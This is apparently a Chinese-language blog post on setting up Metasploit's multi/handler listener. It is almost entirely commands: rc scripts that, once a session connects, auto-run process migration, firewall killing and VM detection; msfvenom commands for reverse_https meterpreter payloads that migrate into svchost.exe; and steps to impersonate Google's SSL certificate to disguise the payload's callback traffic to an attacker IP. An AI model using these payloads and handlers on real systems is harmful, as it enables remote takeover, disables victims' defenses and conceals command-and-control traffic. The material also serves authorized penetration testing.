metasploit监听器

上一篇:msfvenom-生成攻击载荷-命令速查

msf监听器,也就是exploit/multi/handler模块

rc文件使用

rc文件是metasploit可以调用的脚本文件。将要执行的命令写入到每一行,就可以用 msfconsole -r xx.rc来运行,xx.rc是脚本文件的名称,可以自定义,但是后缀要是rc

自动运行任务AutoRunScript

可以在监听器获取到连接后自动运行任务,例如自动迁移进程、关闭防火墙、检测是否是虚拟机

1
set AutoRunScript multi_console_command -rc /home/kali/Desktop/automsf.rc
1
2
3
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
1
2
3
4
5
6
7
8
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8080
set ExitOnSession false
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm

自动迁移到svchost.exe

1
msfvenom -p windows/meterpreter/reverse_https -a x86 -f csharp --platform windows -o out.txt -b "\x00\xff" LHOST=175.12.80.10 LPORT=4433 PrependMigrate=true PrependMigrateProc=svchost.exe

ssl证书

这个url地址实际上是一个metasploit的监听器,其中的ssl证书可以伪造成任意的网站,下面让我们来看看怎么做的吧!

第一步 伪造证书

伪造想要证书的网站,例如google

1
2
3
4
5
#为 reverse_https 负载创建 SSL 证书
msf > use auxiliary/gather/impersonate_ssl
msf auxiliary(impersonate_ssl) > set RHOST www.google.com
msf auxiliary(impersonate_ssl) > run
msf auxiliary(impersonate_ssl) > back

上图可以看到,生成了一个pem,下面的步骤要用到这个文件

第二步 创建payload

1
2
3
4
5
6
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST Your_machine's_IP
msf payload(reverse_https) > set LPORT 443
msf payload(reverse_https) > set stagerverifycert true
msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20220505134808_default_220.181.38.148_220.181.38.148_p_670275.pem
msf payload(reverse_https) > generate -f psh-reflection -o /tmp/rev_https.ps1

使用这个证书文件pem,生成一个powershell反射式注入内存的payload

第三步 设置监听器

1
2
3
4
5
6
7
8
msf payload(reverse_https) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 攻击机IP
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set stagerverifycert true
msf exploit(handler) > set HANDLERSSLCERT /root/.msf4/loot/20220505134808_default_220.181.38.148_220.181.38.148_p_670275.pem
msf exploit(handler) > run

第四步 运行payload

generate -f psh-reflection -o /tmp/rev_https.ps1 使用反射式powershell的payload没有成功,不知道为什么

使用exe类型的payload反弹成功了 generate -f exe -o /tmp/05.exe

参考资料